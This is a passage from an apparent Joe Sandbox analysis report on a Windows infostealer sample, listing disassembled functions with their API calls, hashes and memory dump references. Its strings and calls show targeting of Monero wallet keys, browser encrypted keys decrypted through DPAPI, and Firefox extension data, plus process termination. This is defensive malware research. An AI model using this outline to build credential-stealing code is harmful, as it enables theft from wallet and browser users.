                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CA2E1
                      • lstrlen.KERNEL32(00000000,00000000), ref: 001CA3FF
                      • lstrlen.KERNEL32(00000000), ref: 001CA6BC
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 001CA743
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 259b1c64a67e407d3d793614e657c8e221c73d3e58bffd371ab127388ed2d1e9
                      • Instruction ID: 186d37cb0c1835077ff7e1d78c9ddefd24c0eed69cdff051900fa2988497e9a9
                      • Opcode Fuzzy Hash: 259b1c64a67e407d3d793614e657c8e221c73d3e58bffd371ab127388ed2d1e9
                      • Instruction Fuzzy Hash: 3CE115728101589BCB05FBA4DDA2EEE733CAF34301F90816AF51772191EF306A49DB66
                      Function 001CD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,00E3A280,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CD481
                      • lstrlen.KERNEL32(00000000), ref: 001CD698
                      • lstrlen.KERNEL32(00000000), ref: 001CD6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 001CD72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: a4df5021301432186e0dfe2ba00fa3da503c8c88d3d3581b89f616024f0fd2ae
                      • Instruction ID: a0b8a9c972237b710213a3f332199564f1d2eea052f1debd676acfc8f1644d46
                      • Opcode Fuzzy Hash: a4df5021301432186e0dfe2ba00fa3da503c8c88d3d3581b89f616024f0fd2ae
                      • Instruction Fuzzy Hash: 659137728101589BCB04FBA4DD92EEE7338AF34301F90416AF50777291EF746A49DB66
                      Function 001CD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,00E3A280,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CD801
                      • lstrlen.KERNEL32(00000000), ref: 001CD99F
                      • lstrlen.KERNEL32(00000000), ref: 001CD9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 001CDA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: a4c92ca2db307cc0026c4ab93f3f66598d54f794e4b3421cee963da157002055
                      • Instruction ID: 40a0a76525c05511d1a3d783494369c071f9dc1b4606d06323be6419039e7a8c
                      • Opcode Fuzzy Hash: a4c92ca2db307cc0026c4ab93f3f66598d54f794e4b3421cee963da157002055
                      • Instruction Fuzzy Hash: 7B8126729101549BCB04FBA4DD96EEE7338AF34301F90452AF407B7291EF746A09DBA6
                      Function 001CF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                        • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                        • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                        • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                        • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                        • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                        • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,001E1580,001E0D92), ref: 001CF54C
                      • lstrlen.KERNEL32(00000000), ref: 001CF56B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                      • String ID: ^userContextId=4294967295$moz-extension+++
                      • API String ID: 998311485-3310892237
                      • Opcode ID: f209d61b540fe866096bc61181816b822377ff93632ff30e084753d76e9480be
                      • Instruction ID: 27be4091555c17d33ab18a40768bd0ac95e9a3e0449eb25e585e5413360264ee
                      • Opcode Fuzzy Hash: f209d61b540fe866096bc61181816b822377ff93632ff30e084753d76e9480be
                      • Instruction Fuzzy Hash: F7511771D10148ABDB04FBF4DC96DEE7379AF64300F808529F81667291EF346A09DBA6
                      Function 001D3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: 5714d3e105560443adcd6d573ea74a69d0c96faebdd975ea1f1aa845628f0cb7
                      • Instruction ID: aae13de1d32ba86830497d83ae9d6296b49e02dac1dcb1e5a1dab9b78a7a1b12
                      • Opcode Fuzzy Hash: 5714d3e105560443adcd6d573ea74a69d0c96faebdd975ea1f1aa845628f0cb7
                      • Instruction Fuzzy Hash: 06415F71D10209AFCB04EFE5DC85AEEB774AF58304F40801AE41677390EB75AA45CFA6
                      Function 001C9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                        • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                        • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                        • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                        • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                        • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                        • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001C9D39
                        • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                        • Part of subcall function 001C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                        • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                        • Part of subcall function 001C9AC0: LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                        • Part of subcall function 001C9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001C9B84
                        • Part of subcall function 001C9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 001C9BA3
                        • Part of subcall function 001C9B60: LocalFree.KERNEL32(?), ref: 001C9BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 6c7b82edacc5229b39e627bed0d3bf498dc386a3cf8bd19d95c8dd6ff409370a
                      • Instruction ID: c8ca1c0dd15fb6b29c803d1cfc442054ca7034b35933b3b411e544c8eb8ced78
                      • Opcode Fuzzy Hash: 6c7b82edacc5229b39e627bed0d3bf498dc386a3cf8bd19d95c8dd6ff409370a
                      • Instruction Fuzzy Hash: 33311EB6D10209ABCB14DBE4DC89FEEB7B8AF68304F54451DE906B7241E735DA04CBA1
                      Function 001D94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 001D94EB
                        • Part of subcall function 001D8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001D951E,00000000), ref: 001D8D5B
                        • Part of subcall function 001D8D50: RtlAllocateHeap.NTDLL(00000000), ref: 001D8D62
                        • Part of subcall function 001D8D50: wsprintfW.USER32 ref: 001D8D78
                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 001D95AB
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 001D95C9
                      • CloseHandle.KERNEL32(00000000), ref: 001D95D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                      • String ID:
                      • API String ID: 3729781310-0
                      • Opcode ID: 46b1f1d1f44547fae6ac93f92aff9f07a11e3ccbd871f7090839718594e1cad8
                      • Instruction ID: b83b54bc3ba82365e2b682939ce3f9c679c5150b405cb169f25d74ac04fae4eb
                      • Opcode Fuzzy Hash: 46b1f1d1f44547fae6ac93f92aff9f07a11e3ccbd871f7090839718594e1cad8
                      • Instruction Fuzzy Hash: 29311C71A003489FDB14DBE0DD49BEDB778EF54300F10856AE506AB284DB78AA89CB56
                      Function 001D8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001E05B7), ref: 001D86CA
                      • Process32First.KERNEL32(?,00000128), ref: 001D86DE
                      • Process32Next.KERNEL32(?,00000128), ref: 001D86F3
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • CloseHandle.KERNEL32(?), ref: 001D8761
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 94b5717ac8924cc6aec3e945214cdb9fb50577396b3f0a2fb6650cf57d7a8e45
                      • Instruction ID: c6a55ee32343d2d3f4b868e4634a809381449f8ca4b492df2459d1a09cfcd9e4
                      • Opcode Fuzzy Hash: 94b5717ac8924cc6aec3e945214cdb9fb50577396b3f0a2fb6650cf57d7a8e45
                      • Instruction Fuzzy Hash: 27317C71901258ABCB24EF91CC51FEEB778EF55700F5081AAF50AA22A0DF306E45CFA1
                      Function 001D7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001E0E00,00000000,?), ref: 001D79B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D79B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,001E0E00,00000000,?), ref: 001D79C4
                      • wsprintfA.USER32 ref: 001D79F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
